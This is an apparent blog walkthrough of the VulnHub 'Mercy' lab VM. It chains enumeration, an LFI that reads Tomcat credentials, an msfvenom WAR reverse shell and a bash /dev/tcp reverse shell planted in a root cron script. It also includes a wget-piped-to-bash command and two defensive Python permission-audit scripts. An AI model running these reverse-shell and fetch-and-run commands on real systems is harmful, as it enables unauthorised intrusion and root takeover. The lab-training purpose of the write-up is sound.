DIGITALWORLD.LOCAL MERCY Walkthrough — VulnHub, Multi-step Enumeration — OSCP Practice

Nova
7 min read · Feb 7, 2021

Mercy is an OSCP-like machine in the DIGITALWORLD.LOCAL series, available on VulnHub. In this writeup I demonstrate how thorough enumeration, and connecting the pieces of information gathered at every step, helps to gain a foothold.

Mercy might look complicated at first, but careful enumeration from the start, and taking note of every little piece of information that might be useful, will get us through it.

Preparation

  1. Download Mercy from VulnHub and boot it up in VMware or VirtualBox
  2. Your favorite haxor env; in this article I am using a Kali VM
  3. Find the IP address of the Mercy VM; one way to do it is with nmap
nmap -sn 192.168.1.0/24

In this case the target's IP is 192.168.1.106

Tools

  1. nmap
  2. smbclient
  3. nc
  4. gobuster
  5. msfvenom
  6. Linux Smart Enumeration
  7. find (bash)

Topics

  • Note taking!
  • Port knocking
  • robots.txt
  • Tomcat (war reverse shell)
  • crontab

Enumeration

Starting with good ol’ nmap!

sudo nmap -p- -sC -sV -T4 -O -v 192.168.1.106 -o nmap

Result

# Nmap 7.91 scan initiated Fri Feb  5 11:59:35 2021 as: nmap -p- -sC -sV -T4 -O -v -o nmap 192.168.1.106
Nmap scan report for MERCY.wlan (192.168.1.106)
Host is up (0.0011s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp filtered http
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: STLS CAPA SASL TOP AUTH-RESP-CODE RESP-CODES PIPELINING UIDL
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more IMAP4rev1 STARTTLS post-login listed SASL-IR Pre-login ID ENABLE LOGIN-REFERRALS IDLE capabilities OK have LITERAL+ LOGINDISABLEDA0001
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-08-24T13:22:55
| Not valid after: 2028-08-23T13:22:55
| MD5: 5114 fd64 1d28 7465 e1c8 8fde af46 c767
|_SHA-1: b1d2 b496 ab16 ed59 df4e 396e 6aa4 94df e59f c991
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-08-24T13:22:55
| Not valid after: 2028-08-23T13:22:55
| MD5: 5114 fd64 1d28 7465 e1c8 8fde af46 c767
|_SHA-1: b1d2 b496 ab16 ed59 df4e 396e 6aa4 94df e59f c991
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:2C:AB:27 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.018 days (since Fri Feb 5 11:33:58 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| MERCY<00> Flags: <unique><active>
| MERCY<03> Flags: <unique><active>
| MERCY<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: mercy
| NetBIOS computer name: MERCY\x00
| Domain name: \x00
| FQDN: mercy
|_ System time: 2021-02-05T17:59:55+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-05T09:59:55
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 5 12:00:07 2021 -- 1 IP address (1 host up) scanned in 32.11 seconds
  • Ports 22 and 80 are filtered, meaning they might get opened later somehow; this smells like port knocking!
  • 139 and 445 (Samba/SMB) are open; connecting to them needs creds, which might become useful later!
  • Port 8080 is Tomcat and the default creds don't work, but looking closer at the nmap result reveals the interesting content of robots.txt, worth checking!
| http-robots.txt: 1 disallowed entry 
|_/tryharder/tryharder

Also, looking at the page in a browser reveals the location of the Tomcat users file, which is sensitive info and might be useful.

Users are defined in /etc/tomcat7/tomcat-users.xml.

During the pentest, in addition to screenshots and notes in Obsidian, I write down with pen on paper every little piece of information that might become useful at some point; it helps a lot to circle back and see what we have.

Getting Deeper

Next thing we can try is to check out the content of /tryharder/tryharder, which is a base64 string.

It suggests the password is “password”. From enumerating SMB we saw there was a user named qiu, so let's try that password for it.

And we have access. After mounting the share and searching through hidden files we get to see a lot of configuration, including the port knocking config, which helps us open ports 22 and 80 as we foresaw from the nmap results.

sudo mount //192.168.1.106/qiu smb -o username=qiu -o password=password

The main page on port 80 is a troll, but there might be interesting stuff sitting behind it.

gobustering…

gobuster dir -k -w /usr/share/wordlists/dirb/common.txt -t 1 -u http://192.168.1.106 -o gobuster-80
  • Another robots.txt with interesting stuff!
  • /time returns the current time of the system; this indicates some script is running somewhere. It might come in handy later, so let's write it down in the notebook!

Browsing the locations in robots.txt, /nomercy returns RIPS 0.53; after googling, it turns out it has multiple local file inclusion vulnerabilities:

https://www.exploit-db.com/exploits/18660

We dump /etc/passwd as the exploit docs suggest, but we also have the path of the Tomcat users file, which we can presumably read too, plus the Tomcat login URL from the enumeration part.

So let's dump the Tomcat users with the RIPS LFI and try to log in to Tomcat.

http://192.168.1.106/nomercy/windows/code.php?file=../../../../../etc/tomcat7/tomcat-users.xml

The super-duper long one works! Let's also take a note of the fluffy account; it might come in handy!
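From the defender's side, two things made this step work: tomcat-users.xml was readable by the web server account (so the LFI could fetch it), and it contained a cleartext account with deploy rights. The following is an added example, not code from the original post and not Tomcat's own tooling, of a small audit script that flags both conditions. It runs against a constructed sample file (the real contents of the Mercy file are not reproduced here); the role and default-password lists are assumptions based on common Tomcat defaults.

```python
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample file; this is NOT the real tomcat-users.xml from the Mercy VM.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="tomcat"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="deployer" password="Correct-Horse-Battery-Staple-2021"
        roles="manager-gui,manager-script"/>
</tomcat-users>
"""

# Roles that allow deploying a WAR, i.e. running code as the tomcat user (assumed list).
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
# Well-known defaults that password-guessing tools try first (assumed list).
DEFAULT_PASSWORDS = {"tomcat", "s3cret", "admin", "password", "manager", "role1", "changethis"}


def local_name(tag):
    """Strip an XML namespace ('{ns}user' -> 'user') so Tomcat 7 and 8+ files both parse."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(path):
    """Return a list of human-readable findings for a tomcat-users.xml file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        # On Mercy the file could be read through an LFI running as the web server
        # account; anything beyond owner/group readable is a finding.
        findings.append(f"{os.path.basename(path)} is readable by others (mode {oct(mode)})")
    root = ET.parse(path).getroot()
    for elem in root.iter():
        if local_name(elem.tag) != "user":
            continue
        name = elem.get("username") or elem.get("name")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if roles & DEPLOY_ROLES:
            findings.append(f"user {name!r} can deploy applications: roles {sorted(roles & DEPLOY_ROLES)}")
        if password.lower() in DEFAULT_PASSWORDS:
            findings.append(f"user {name!r} uses a well-known default password")
        elif "$" not in password and len(password) < 12:
            # Heuristic: Tomcat's digested passwords contain '$' separators; a short
            # value without one is most likely short cleartext.
            findings.append(f"user {name!r} has a short cleartext password")
    return findings


def demo(mode=0o644):
    """Write the constructed sample with the given file mode and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "tomcat-users.xml")
        with open(path, "w") as fh:
            fh.write(SAMPLE_TOMCAT_USERS)
        os.chmod(path, mode)
        return audit_tomcat_users(path)


if __name__ == "__main__":
    for line in demo():
        print("-", line)
```

With the sample at mode 0644 the script reports the world-readable file, the default password on the tomcat account and the deploy-capable roles on the deployer account; tightening the file to 0640 (owned by root, group tomcat7) removes the first finding, which is exactly what would have stopped the LFI from reading it on this box.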

Now we can deploy a Tomcat application, which in our case is a reverse shell made by msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.105 LPORT=3333 -f war > shell.war

Start your local nc listener to catch the reverse shell, then go to Browse > Deploy in the Tomcat manager and select the WAR so it runs on the server!

We got a shell as the tomcat user. Enumerating it doesn't lead us anywhere, so let's switch to the fluffy account

and enumerate again with the Linux Smart Enumeration script!

bash <(wget -q -O - https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh) -l2 -i

It still doesn't lead us anywhere… Backing up a bit and looking at our notes reminds us that there was a /time that returned the current time, so let's search the file system for "time",

which returns /var/www/html/time, the output of a script somewhere that is either named differently or hidden. After searching through hidden files, we find .private in fluffy's home directory.

find /home -iname ".*" 2>/dev/null

And bam, the timeclock script is exactly the thing that gets us root access: it's owned by root and has 777 permissions, so we can write to it as fluffy!

Let's add a reverse shell to the script, so the next time the root-owned cron job runs it, it returns a root shell!

bash -i >& /dev/tcp/192.168.1.105/4444 0>&1

Post Exploitation

There wasn't much to discover inside this machine, but I just wanted to check the crontab: every 3 minutes timeclock is executed by root :)
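The root cause of the privilege escalation above is a script that root runs from cron while a lower-privileged user can change it. Below is an added example, not part of the original post, of an audit you can run on a host to catch that pattern before someone else does: it parses /etc/crontab-style entries run as root, resolves the script each one executes, and flags scripts that are world- or group-writable, not owned by the expected user, or sitting in a world-writable directory without the sticky bit. The crontab text and the file layout (a `timeclock` under a `.private` directory with mode 777, plus two other scripts) are constructed in a temporary directory for the demonstration; they are not the real paths or file contents from the Mercy VM.

```python
import os
import stat
import tempfile

# Interpreters that may precede the real script in a cron command (assumed list).
INTERPRETERS = {"sh", "bash", "dash", "python", "python2", "python3", "perl", "php", "ruby"}


def parse_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style text.
    Regular lines: 5 time fields, a user, then the command.
    '@reboot'/'@hourly' lines: 1 special field, a user, then the command."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:   # SHELL=/bin/sh, PATH=... assignments
            continue
        n_time = 1 if line.startswith("@") else 5
        parts = line.split(None, n_time + 1)
        if len(parts) < n_time + 2:          # malformed line, nothing to audit
            continue
        entries.append((parts[n_time], parts[n_time + 1]))
    return entries


def script_path(command):
    """Pick the script a cron command runs: the first absolute path that is not an interpreter."""
    for token in command.split():
        if os.path.basename(token) in INTERPRETERS:
            continue
        if token.startswith("/"):
            return token
    return None


def audit_entry(path, expected_uid=0):
    """Problems that let someone other than the owner change what cron will execute."""
    problems = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["script missing (stale entry or wrong path)"]
    mode = stat.S_IMODE(st.st_mode)
    if st.st_uid != expected_uid:
        problems.append("not owned by the cron user")
    if mode & stat.S_IWOTH:
        problems.append(f"world-writable (mode {oct(mode)})")
    elif mode & stat.S_IWGRP:
        problems.append(f"group-writable (mode {oct(mode)})")
    pmode = stat.S_IMODE(os.stat(os.path.dirname(path)).st_mode)
    if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
        problems.append("parent directory world-writable without sticky bit (script can be replaced)")
    return problems


def audit_crontab(text, expected_uid=0):
    """Map each script run by root to its list of problems (empty list means clean)."""
    report = {}
    for user, command in parse_crontab(text):
        if user != "root":
            continue
        path = script_path(command)
        if path is not None:
            report[path] = audit_entry(path, expected_uid)
    return report


def demo():
    """Build a constructed file layout in a temp dir and audit a constructed crontab."""
    with tempfile.TemporaryDirectory() as tmp:
        def make(rel, file_mode, dir_mode=0o755):
            path = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            os.chmod(os.path.dirname(path), dir_mode)
            with open(path, "w") as fh:
                fh.write("#!/bin/bash\necho placeholder\n")   # constructed body
            os.chmod(path, file_mode)
            return path

        timeclock = make("home/fluffy/.private/timeclock", 0o777)   # the Mercy pattern
        backup = make("opt/backup.sh", 0o755)                        # clean entry
        cleanup = make("dropzone/cleanup.sh", 0o755, dir_mode=0o777) # subtle: dir is writable
        crontab = f"""# constructed sample /etc/crontab
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
*/3 * * * *  root    /bin/bash {timeclock}
0 2 * * *    root    /bin/sh {backup} --quiet
0 * * * *    root    {cleanup}
*/5 * * * *  fluffy  {timeclock}
"""
        # The files were created by this process, so treat our own uid as the cron user.
        report = audit_crontab(crontab, expected_uid=os.getuid())
        return {os.path.relpath(p, tmp): probs for p, probs in report.items()}


if __name__ == "__main__":
    for path, problems in demo().items():
        print(path, "->", problems or "ok")
```

Note the third entry: the script itself is 755, but its directory is world-writable, so it could be renamed and replaced rather than edited; a permissions check that only looks at the file would miss it. The fix on a real host is the same in both cases: root-owned, 755 or stricter, in a root-owned directory.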

Conclusion

This machine might not be a technical adventure, but it certainly engages your hacking brain and gives you the mindset to look clearly and closely and take good notes of every little detail, which might become helpful later on.

I hope you enjoyed this post.

Nova

Breaking stuff to learn them, learning stuff to break them!